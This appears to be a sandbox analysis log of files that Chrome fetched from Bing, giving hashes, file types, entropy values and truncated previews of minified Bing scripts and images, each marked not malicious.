                                                                                                    MD5:C0DFFF741E6461BE535E7A402634E9D0
                                                                                                    SHA1:998B44EF05CBEC6605E88CDEEF3354CBCF9A566C
                                                                                                    SHA-256:A29707E768A53201E2AB26D83E5746E6F22E1C573743A66C50B7E5D19F6B531E
                                                                                                    SHA-512:BCD06CBD6A785AAF21946382FBF4E09DFE47E3FA50C3210090BC646266499A915DF98B811D4EAED9083400E844CCCCF7F1A78C1D0FAAE570D265793AEDA20195
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var MobileIcon;(function(){function ei(){ri?f=h.Homepage:ui?f=h.Chat:ii?f=h.SERP:fi&&(f=h.ImageCreator)}function oi(){var t,r;rt()?((t=n===null||n===void 0?void 0:n.classList)===null||t===void 0?void 0:t.add("b_hide"),i("overlap")):((r=n===null||n===void 0?void 0:n.classList)===null||r===void 0?void 0:r.remove("b_hide"),Log.Log(e,wt,"resize"))}function rt(){return(nt===null||nt===void 0?void 0:nt.offsetWidth)-((a===null||a===void 0?void 0:a.offsetWidth)+(g===null||g===void 0?void 0:g.offsetWidth)+it)<dt}function r(t){var r=_ge("id_mobpopcntr");(n===null||n===void 0?void 0:n.contains(t===null||t===void 0?void 0:t.target))||(r===null||r===void 0?void 0:r.contains(t===null||t===void 0?void 0:t.target))||i("ClickPage")}function at(n){n.key==="Escape"&&i("EscapeKeydown")}function vt(){hi();n===null||n===void 0?void 0:n.classList.add("active");y=!0;ci();t&&t.focus()}function si(){if(sj_gx){var n=sj_gx(),t=void 0;switch(!0){case ni:t="/header/mobupsellflyvid/?enablevidflyoutl2="+(ti?"1":"0")+
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (8674), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):8674
                                                                                                    Entropy (8bit):5.212727429542033
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:a4/1MfRZ4V9bmVKnhHKBEs9F3kBlVD+mxHpfuq:ac1MfRkHpiEs9dkBfDLJfuq
                                                                                                    MD5:1C0981AC86E2EA5B7F08F34548AF3280
                                                                                                    SHA1:57324208DDB3A9E80ABD3346607D712C999C2E50
                                                                                                    SHA-256:00FF3483D93259AEDB929A9FEE4454A623830B18A08F08781AC1961C1E98774A
                                                                                                    SHA-512:0F7185A8579D9BF1B89623BF126C58789010C76F7E279A3F44064C78B2E3E04BB0A89394E6BE185618071153BC872E43A69211255F3470E1120E51AB0D5F2329
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/VzJCCN2zqegKvTNGYH1xLJmcLlA.js
                                                                                                    Preview:(function(n,t,i,r,u,f,e,o,s){function w(n,t,i){var r=[],u;return n&&(i=i||"*",u=n.getElementsByTagName(i),h(u,function(n){nt(n,t)&&r.push(n)})),r}function b(n,t,i){var r=[];return h(n,function(n){var u=w(n,t,i);u&&u.length>0&&(r=r.concat(u))}),r}function bt(n,t){var i=[];return h(n,function(n){var r=null;try{r=n.querySelector(t)}finally{r&&(i=i.concat(r))}}),i}function ut(n){return g[n]||(g[n]=new RegExp("\\b"+n+"\\b")),g[n]}function nt(n,t){var i=n.className||"";return ut(t).test(i)}function y(n,t){n.className=n.className||"";nt(n,t)||(n.className+=" "+t)}function p(n,t){var i=n.className||"",r=ut(t);n&&i&&t&&(n.className=n.className.replace(r,"").replace(/\s+/," "))}function a(n){return f(n),u(n),!1}function kt(n){return(n=n||i.event,n.pageX||n.pageY)?{x:n.pageX,y:n.pageY}:{x:n.clientX+s.scrollLeft-s.clientLeft,y:n.clientY+s.scrollTop-s.clientTop}}function c(n,t){var i=n.currentStyle,r=0,u;return _w.getComputedStyle&&(i=_w.getComputedStyle(n),sb_ie&&(r=parseFloat(i.paddingTop)+parseF
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (560), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):560
                                                                                                    Entropy (8bit):4.742600822971018
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:CFmwsCfyMJoAfrk3bV0tRWERW5kTGb3aINVN/t/jgClRXirA:CFmNWaAwRCRWERW5kTGb3l1tMClRd
                                                                                                    MD5:9B28631B7C46706DBB7EEF2D16D9549B
                                                                                                    SHA1:2A463D97AF924D3B10C250181D0D902562494184
                                                                                                    SHA-256:F8FA36AB6505DA51BEF5521EF84793391BE9C16DE5ABD6BB99C20FE4D1FB48CF
                                                                                                    SHA-512:9E85DB806D0CBEEC5007D0AB90BEFA6CB036995110637EC616D93FCC4A2A9BAF59BB0ABEF98913E5D9FD88BE445C9ABC04E0B6C7533E4384F945CB743A4CF488
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var Lib;(function(n){var t;(function(n){function t(n){return n&&n.classList}function i(n,i){t(n)&&n.classList.add(i)}function r(n,i){t(n)&&n.classList.remove(i)}function u(n,i){t(n)&&n.classList.toggle(i)}function f(n,i){return t(n)&&n.classList.contains(i)}function e(n,t){return n.getElementsByClassName?n.getElementsByClassName(t):null}function o(n){return n instanceof SVGElement?n.getAttribute("class"):n.className}n.add=i;n.remove=r;n.toggle=u;n.contains=f;n.getElementByClassName=e;n.getClassAttribute=o})(t=n.CssClass||(n.CssClass={}))})(Lib||(Lib={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (7155), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7155
                                                                                                    Entropy (8bit):5.435598317550486
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:paWT3REjhNn5y1Myoy+y25syZWNKo5xp5VUILj/rVEkVu4akUr:paWzEhNn5y1Myoy+y25syq/VUIX/1aka
                                                                                                    MD5:DC221228E109F89B8B10C48F2678FB46
                                                                                                    SHA1:1BFC85CBA5C424136941AC1DFD779A563B5BEED4
                                                                                                    SHA-256:F4FB7234959F48C2B2CA73FD6C35D36EAF65D8C431D982A1BA208F5CDC766419
                                                                                                    SHA-512:46F49E5AC18436251778D1F50C027729A2442ED6541C3162D878720703E37797B6028D96EB1568C23EC5006FB022C8E05855E250D6A1A590F41E890866529CD2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var QuickSearch;(function(n){function et(n){var t=_w.location.protocol+"//"+_w.location.hostname+"/chat?q="+encodeURIComponent(n)+"&showconv=1&sendquery=1&form=IPRV10";a?window.open(t):_w.location.href=t}function w(n){sb_st(function(){var it,rt,ut,ft,f,a,w,st,d,at,s,v,g,vt,ht,y,p,ct,nt;if(l=null,NodeList.prototype.forEach||(NodeList.prototype.forEach=function(n,t){t=t||window;for(var i=0;i<this.length;i++)n.call(t,this[i],i,this)}),f=window.getSelection(),t=(it=f===null||f===void 0?void 0:f.toString())!==null&&it!==void 0?it:"",a=_ge("qs_searchBox"),w=o?_ge("mfa_root"):null,!o||w!=null){var lt,et=!0;f!=null&&f.anchorNode!=null&&(lt=f.anchorNode.nodeValue||f.anchorNode.textContent,et=!tt.some(function(n){return n!=null&&n!=undefined?n.contains(f.anchorNode):!1}),f.anchorNode.childNodes!=null&&f.anchorNode.childNodes.forEach(function(n){(n.nodeName==="INPUT"||n.nodeName==="TEXTAREA")&&(et=!1)}));st=!0;dt()||f.type=="Range"||(st=!1);t.trim()!=""&&et&&st&&u&&t.trim().length<2048?(sj_log("C
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (667), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):667
                                                                                                    Entropy (8bit):5.251512275863699
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:fr5esz7hNGwXI2QA3QglxfLQOtKfWM1kI2JGC+t5821xw9i/UJpN0I:fr5NhNGOgAggDDQOtjMbhH582Ugk0I
                                                                                                    MD5:2AB12BF4A9E00A1F96849EBB31E03D48
                                                                                                    SHA1:7214619173C4EC069BE1FF00DD61092FD2981AF0
                                                                                                    SHA-256:F8B5ACF4DA28E0617F1C81093192D044BD5A6CC2A2E0C77677F859ADCF3430AC
                                                                                                    SHA-512:7D5AAE775BE1E482EADA1F453BEA2C52A62C552FA94949E6A6081F322E679E916B1276BB59FF28CF7C86D21727BCC329ECB03E5D77CA93204E0CD2694FAA72BD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:sb_ie&&function(){function h(){if(t){var u=n.replace(/www\./i,"");return f&&i(t,r,n+"?PC="+f)||i(t,r,n)||i(t,r,u)||i(t,r,n+"?Form=HPPDH1")||i(t,r,n+"?PC=BNHP")||i(t,r,n+"?PC=BNSR")}return 0}function c(){return i(_w.external,s,n)!=0}function l(){if(u){var n=2*e+o;if(u==n)return!0}return!1}function a(){var n=_ge("hps");return n||(n=sj_ce("span","hps"),n.style.behavior="url(#default#homepage)",sj_b.appendChild(n)),n}function i(n,t,i){try{return n[t](i)}catch(r){return 0}}var s="IsSearchProviderInstalled",r="isHomepage",n="http://"+_d.domain+"/",u=sj_cook.get("_UR","D"),f=sj_cook.get("SRCHS","PC"),t=a(),e=h(),o=c();l()||(u=2*e+o,sj_cook.set("_UR","D",u,1,"/"))}()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1274), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1274
                                                                                                    Entropy (8bit):5.30620342636407
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:+Fq4YTsQF61KWllWeM2lSoiLKiUfpIYdk+fzWPn8X0kdo6QBUf4JPwk:+FGF6UYXEBi9k5P8OPUY
                                                                                                    MD5:A969230A51DBA5AB5ADF5877BCC28CFA
                                                                                                    SHA1:7C4CDC6B86CA3B8A51BA585594EA1AB7B78B8265
                                                                                                    SHA-256:8E572950CBDA0558F7B9563CE4F5017E06BC9C262CF487E33927A948F8D78F7F
                                                                                                    SHA-512:F45B08818A54C5FD54712C28EB2AC3417EEA971C653049108E8809D078F6DD0560C873CEB09C8816ECD08112A007C13D850E2791F62C01D68518B3C3D0ACCCEB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/fEzca4bKO4pRulhVlOoat7eLgmU.js
                                                                                                    Preview:var Identity=Identity||{};(function(n,t,i,r,u,f,e){e.wlProfile=function(){var r=sj_cook.get,u="WLS",t=r(u,"N"),i=r(u,"C");return i&&e.wlImgSm&&e.wlImgLg?{displayName:t?t.replace(/\+/g," "):"",name:n(t.replace(/\+/g," ")),img:e.wlImgSm.replace(/\{0\}/g,f(i)),imgL:e.wlImgLg.replace(/\{0\}/g,f(i)),idp:"WL"}:null};e.headerLoginMode=0;e.popupAuthenticate=function(n,i,r){var o,u,h,c,v=sb_gt(),l=Math.floor(v/1e3).toString(),s="ct",a=new RegExp("([?&])"+s+"=.*?(&|$)","i");return n.toString()==="WindowsLiveId"&&(o=e.popupLoginUrls,u=o[n],u=u.match(a)?u.replace(a,"$1"+s+"="+l+"$2"):u+"?"+s+"="+l,e.popupLoginUrls.WindowsLiveId=u),(o=e.popupLoginUrls)&&(u=o[n]+(i?"&perms="+f(i):"")+(r?"&src="+f(r):""))&&(h=e.pop(u))&&(c=setInterval(function(){h.closed&&(t.fire("id:popup:close"),clearInterval(c))},100))};e.pop=function(n){return r.open(n,"idl","location=no,menubar=no,resizable=no,scrollbars=yes,status=no,titlebar=no,toolbar=no,width=1000,height=620")};var s=u("id_h"),o=u("id_l"),h="click";t.bind("o
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 2501 x 831, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):871456
                                                                                                    Entropy (8bit):7.99321885800314
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:0gKYAG/kgSHCI1lCaBDevD+ht1s996/cZoCCejkEnK3eXJdcKyMn5A+dZLw:rQR/1l9evDGdEZRzgAJdB/DdZE
                                                                                                    MD5:46B510EC8A77F53E8C201F8779D69E42
                                                                                                    SHA1:A21718B5BA16FF1BC10C43FFE9F4823D5EB414B0
                                                                                                    SHA-256:D7315CEF7F382EB88B09A82EB3D5F13564105D5CE8413888963699E4BB523895
                                                                                                    SHA-512:17E5C09882E8700C731AFE807F98D30658058CB9AC74A60CD291C37F0242863A2FB524829D708867529A368463D5949097D25DA5C6E6CF87DE0F9B125CA614AC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR.......?.......(.....pHYs.................sRGB.........gAMA......a...K.IDATx.......y..>..}.].n-.R.$.%K.,#K.e....6.6.m.a9....0..=}.i...9s.9}.....{`.6....h....j......ZJ.Rm......%3&#3.'.}oI6.H.._.w.\"##"#.'..<".......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 80x80, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):3270
                                                                                                    Entropy (8bit):7.861555155624122
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TMEb/NWiOZAUlom1/0IXmSEDI9uLorLeF:Qm/sOUaq0YmZDAxLeF
                                                                                                    MD5:389012E732A8E2B3E2F099670E365863
                                                                                                    SHA1:8809045216824D254A82EDAE5DE25645CF67F15A
                                                                                                    SHA-256:2BD47CA5CDA41853E20788B832079C201A0A7879581DD11372D205D388045403
                                                                                                    SHA-512:23217EC63DECD946BFB8C9F076E202DB7A5E47FC04183F3BCAE4605F05CCBAEE66175AC6E36DEC464CC8582BBA2A5581B38EA003E1AE2CE38D108135D8074860
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=OVFT.ew5-5nXkteN7v5KNN4ndES&pid=News&w=80&h=80&c=14&rs=2&qlt=90
                                                                                                    Preview:......JFIF.....`.`.....C....................................................................C.......................................................................P.P.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....XF...H....W.L.]..TG.Q.t...<1.F.....va]...W..6.....E.i...c..K..B...e.}.../D.t..b.@..V. \t.....^.-["^..>.....bj.:].d...h.V.~,..Z.[o.G..=..So....4..E}.6.....h.0...!..|......d.7...x.K.;..F.st.1....V..g.87..H..?.8.]?6|0?f.~(....gq!.....O=xf.....~'...x..OHm..Z....=.>e.......iOl.>G..UU?...Vo..[..O...Z.R5..Dd.....q.N..NJQW..}..V....6....$....OI.`..5>.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (807), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):807
                                                                                                    Entropy (8bit):5.1636159181057915
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2QwhGeo8XKomlA7sqZ1BJcn3F9x1kCAVU:s9oqKo9s+cn3TxiVU
                                                                                                    MD5:D2A0750F1255B01FCB61E1EC696A3824
                                                                                                    SHA1:CC28912310EF3128A80F2364352F516B44DA443D
                                                                                                    SHA-256:9AE661BB5617387893837A9221D8B170D3ECE93CBD896CAFDA9F498631006A44
                                                                                                    SHA-512:85E55F47AB5AD7C8F5194D9A6D6BC89A10B396B6AF61F313451082815972A9117FC52F7F93B9EC42893B6382AC0C8CB3CC3DF0C625CF95CAEB953F6D06CB15D6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(){function i(){n=IFrameOverlay;f()}function r(t){var f=sj_et(t),i=s(f,"A"),r;i&&(i.getAttribute("data-idpovrly")==="1"||u(i.href))&&!e(t)&&!o(i)&&(r="&mode=overlay",n.show([i.href,t],!0,r),sj_sp(t),sj_pd(t),sj_evt.fire("clearHover"),sj_evt.fire("idpovrlyOpen",i))}function u(n){return n&&n.toLowerCase().indexOf("view=detailv2")!=-1}function f(){SmartEvent.bind(_d,"click",r,!0,!0)}function e(n){return n&&(n.button===1||n.button===2)}function o(n){var r,i;if(n&&n.href){if(n.getAttribute("data-idpignore")=="1")return!0;if(r=n.href,r.indexOf("#CA!")>0)for(i=0;i<t.length;i++)if(r.indexOf(t[i])>0)return!0}return!1}function s(n,t){for(;n&&n!==document;n=n.parentNode)if(n.tagName===t)return n;return null}var n=null,t=["#CA!Unsave","#CA!Save","#CA!ExpandSecondaryAction","#CA!MarkAsAdult"];i()})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (2014), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2016
                                                                                                    Entropy (8bit):5.3161096027675105
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:bnXL8sjfZ/Fslrgj3rzIRlK0KqoLi7XSOLFTt+jCz1T9XNZTs3Gan/An0:bnoshqlMQRlZTolKOEXNZsWan/An0
                                                                                                    MD5:D807DBBB6EE3A78027DC7075E0B593FF
                                                                                                    SHA1:27109CD41F6B1F2084C81B5D375EA811E51AC567
                                                                                                    SHA-256:0ACDCE370092C141B0C6617ED6E2163F04BB9B93D3213B62C2BC7A46FE0243C7
                                                                                                    SHA-512:E037DFC31D595B459660FE7D938EEDB4F43D208D247174EE8D6FD0D125F211142CD73497E4601893CECB6F565B7E2E7815CE416D72BB95504D3F277E4E806D11
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var SerpKeyboardNavigation;(function(){function c(){h=_d.activeElement;n=null;u=null;e=!1;t=-1;nt();u=_w.NavSelector&&NavSelector(!1)}function p(){v();n=null}function w(i){var e,h,o;i&&(e=_d.activeElement,h=s&&e&&e.className&&e.className.indexOf("feedback-binded")!==-1,i.keyCode==r.Tab&&s&&(f("TOP"),s=!1),u&&e&&e.className!=="b_searchbox"&&!h&&(i.keyCode==r.Enter?(n=null,f(t==-1?"EN":"EE",t)):b(i)&&(o=k(i.keyCode),o!==-1&&o!==t&&(tt(o),sj_pd(i)))))}function f(n,t){sj_log("CI.SerpKeyboardNav",n,t?t.toString():"")}function b(t){var i,r=(i=_d.querySelector("#b_sydConvCont cib-serp"))===null||i===void 0?void 0:i.getAttribute("mode");return n||h==_d.activeElement?t.altKey||t.ctrlKey?!1:r&&["conversation","notebook"].includes(r)?!1:!0:!1}function k(n){if(n===r.Tab)return d();if(n===r.Down||n===r.Up){var t=document.activeElement;return t&&(t.tagName.toLowerCase()==="select"||t.tagName.toLowerCase()==="input")?-1:g(n===r.Down)}return-1}function d(){var i=-1;return n?(v(),e=!0,t=-1,f("TO")):(i=
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1898
                                                                                                    Entropy (8bit):5.157798792628297
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:zjyVW/s7StTJEH9cgpbBNzH9o+bX8WH9jFH9bEu9h2e:qVYQJXb78WXj
                                                                                                    MD5:1E1DEA49A39DB57297EB87F0793184DA
                                                                                                    SHA1:E403E863BC213515DA652DF659E00CE352F9FB18
                                                                                                    SHA-256:136E085FE5E3342897A4506B3F7237C86CD48DEE44F743DB7315D8A23B464301
                                                                                                    SHA-512:413D4633D807A31762123DC35F46AE4139CF45DF0D4480EF84A8B1FF9DF61C7F557F01CDF504E568E487CB57889DE2AF06ECEB672516F69D6467CE098573C715
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/5APoY7whNRXaZS32WeAM41L5-xg.svg
                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" xmlns:v="https://vecta.io/nano"><rect x=".25" y=".25" width="23.5" height="23.5" rx="11.75" fill="#fff"/><rect x=".25" y=".25" width="23.5" height="23.5" rx="11.75" stroke="#e5e5e5" stroke-width=".5"/><path d="M6.277 4.254c-.198.245-.296.556-.274.87v13.751c-.021.317.084.63.292.87l.044.05 7.684-7.702v-.187L6.32 4.211l-.044.044z" fill="url(#A)"/><path d="M16.572 14.659l-2.549-2.567v-.187l2.549-2.568.056.037 3.052 1.728c.87.491.87 1.299 0 1.797l-3.04 1.728-.068.031z" fill="url(#B)"/><path d="M16.646 14.63L14.023 12l-7.746 7.746c.176.156.401.246.636.254s.465-.067.651-.211l9.083-5.16z" fill="url(#C)"/><path d="M16.646 9.376l-9.083-5.16a1 1 0 0 0-1.287.037l7.746 7.746 2.624-2.623z" fill="url(#D)"/><defs><linearGradient id="A" x1="13.339" y1="4.982" x2="2.907" y2="15.413" gradientUnits="userSpaceOnUse"><stop stop-color="#00a0ff"/><stop offset=".01" stop-color="#00a1ff"/><stop offset=".26" stop-color="#00beff"/><stop of
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (308), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):308
                                                                                                    Entropy (8bit):5.096104742721561
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:qR6NQTM+fHtRWPM/oXZeKE85whQvVt0iYGjmqjJLsmTczfIAO:w6NQtfNRW0/J8idihKq1LvTxAO
                                                                                                    MD5:E849F94CD30EC77987643A0D405E33E4
                                                                                                    SHA1:D911609DA72CCFA9CFC3DBEFC5DF00185C9A42BF
                                                                                                    SHA-256:B39968F3AB3C3867EFC7115C77D0239B0A2C505AE87766231BF46E32F7797C43
                                                                                                    SHA-512:DBC5EF102C16D14A99F090821176B3706BA08D87D1EFBA817D763AF969A10F9058C7AA0CE54D442DC816E84D294B52DC78623416044C1B6EFA59A28055B48504
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:"https://r.bing.com/rs/6r/sQ/jnc,nj/2RFgnacsz6nPw9vvxd8AGFyaQr8.js?or=w"
                                                                                                    Preview:var ProgressiveImages;(function(){function n(){for(var n,t,r=_d.getElementsByTagName("img"),i=0;i<r.length;i++)n=r[i],t=n.getAttribute("data-src-hq"),t&&n.src!=t&&(n.src=t)}sj_evt.bind("onP1",n,1);sj_evt.bind("ajax.postload",n,1);sj_evt.bind("loadProgImages",n,1)})(ProgressiveImages||(ProgressiveImages={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (19008)
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):316988
                                                                                                    Entropy (8bit):5.239088634343518
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:vLKLj7yjWF276GNg9fpe3HdabIKSB1DkCXW8o0oMlppfbm:zgj7bSB1DkCXW8T5dbm
                                                                                                    MD5:8192D891E754AFD81A399F98BC6B265F
                                                                                                    SHA1:965E6C69F45118FEAB86EEEBBB0FC4964F2B3A98
                                                                                                    SHA-256:E2E4D97C20D4478E8E947480C8F6C71A2C795776D405366BE70DB82E4EA4BA77
                                                                                                    SHA-512:7C2712A1E34DA9062F50E7D93F4E74772044E45C265C682ABCD4E28E4004DCDAF6CE7479A4E8785986A88A32257E4FAC0ECF8CE23AFE47968C4510DF0A2C800B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/ll5safRRGP6rhu7ruw_Elk8rOpg.js
                                                                                                    Preview:/*! @azure/msal-browser v2.28.2 2022-09-06 */."use strict";!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e="undefined"!=typeof globalThis?globalThis:e||self).msal={})}(this,(function(e){./*! *****************************************************************************. Copyright (c) Microsoft Corporation... Permission to use, copy, modify, and/or distribute this software for any. purpose with or without fee is hereby granted... THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH. REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY. AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,. INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM. LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR. OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (429), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):429
                                                                                                    Entropy (8bit):5.098203134109495
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:GtAJv9xWHXWpwYMEX3IR6lVDZWhHD6GkPsHKHOZzu2wBRHJhNURtAJ4ZQetAJD:GeyWeYMEnsUVoHoigkhwBRphNQR+e+
                                                                                                    MD5:0794C2FFC9AAF238496BF687A9C68799
                                                                                                    SHA1:7938BE485611F9D417E84B8C0A74BD3C589E052F
                                                                                                    SHA-256:805AAA9634639B2EAA912E117219727DFA6E92A63B8B92569C336A9CCDE52DEE
                                                                                                    SHA-512:FEFBFBD39B9B86D8975D8FAAB62B50515488E9BF1E21AD72FED9FA93614E10ADAFC99DA77349EAD2501B89D422D766ADC313B6024BCB9B331AB83A7B99BB135F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var SBIImgsHelper;(function(){function i(){typeof SbiUtil!="undefined"&&(SbiUtil===null||SbiUtil===void 0?void 0:SbiUtil.oncop(SbiUtil.rt,r))}function r(i){var r=i.target||i.srcElement,u;r&&r.tagName==="IMG"&&r.classList.contains(n)&&r.src&&(u=r.getAttribute(t),u&&sj_evt&&sj_evt.fire&&sj_evt.fire("sbi_searchimgurl",SbiUtil.gimg(r),u,null,SbiUtil.gaps(r)))}var n="sbiable",t="data-sbiid";i()})(SBIImgsHelper||(SBIImgsHelper={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (7179)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7180
                                                                                                    Entropy (8bit):5.161749091368312
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:HA1SI+LtL5XIr10Tjyf8J+Bz9NgR51fuPKZs7f/:g1SIiXhqabao6/
                                                                                                    MD5:8E28DB3A65522AE2012DE9ADCE4DE5BF
                                                                                                    SHA1:84EA63544DA64A2355256B0BAE973AE1EAE04CE6
                                                                                                    SHA-256:ADF7F9B0DD938575C72FF1592EA18E7AB9BC53FF8838A38C8484C10F5D9BE7FD
                                                                                                    SHA-512:4319C5B3C4B880ADE6E25B28609A14152389CC8D835AD213D58984153C3E7FF8718B2829A330A7EA4F2C11DB68C358438563FB301D9D6240BF833CEE1462756C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var webVitals=function(e){"use strict";var n,t,r,i,o,a=-1,c=function(e){addEventListener("pageshow",(function(n){n.persisted&&(a=n.timeStamp,e(n))}),!0)},u=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},s=function(){var e=u();return e&&e.activationStart||0},f=function(e,n){var t=u(),r="navigate";a>=0?r="back-forward-cache":t&&(document.prerendering||s()>0?r="prerender":document.wasDiscarded?r="restore":t.type&&(r=t.type.replace(/_/g,"-")));return{name:e,value:void 0===n?-1:n,rating:"good",delta:0,entries:[],id:"v4-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},d=function(e,n,t){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){n(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},t||{})),r}}catch(e
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (684), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):684
                                                                                                    Entropy (8bit):5.166363591063823
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:2Q12lkSF3mVwl/BJWhuSpOYkM3+Pu1w2E1fNPrQ5uj5lD+QgAjTYCXPrQuN:2Q1QkSFr5BJupODpfPrQ8Dn/XPrQuN
                                                                                                    MD5:C1D04951E98B892931D4C2BC34555057
                                                                                                    SHA1:55E6297F3499B4961C8E956F7F088868CD59C769
                                                                                                    SHA-256:7C317940549467B3210D2F72DA000BAC3481ABFDE3AC5358D398EB64DCBC8532
                                                                                                    SHA-512:D427487C00AF5E8D9DB222F8A01521A5C8646AE8E459D517443DAC8EF2DBEC2DDEA91877B095B82CF3E52031E1650C7360811ED8A06E02F85E3517974D36AD96
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/VeYpfzSZtJYcjpVvfwiIaM1Zx2k.js
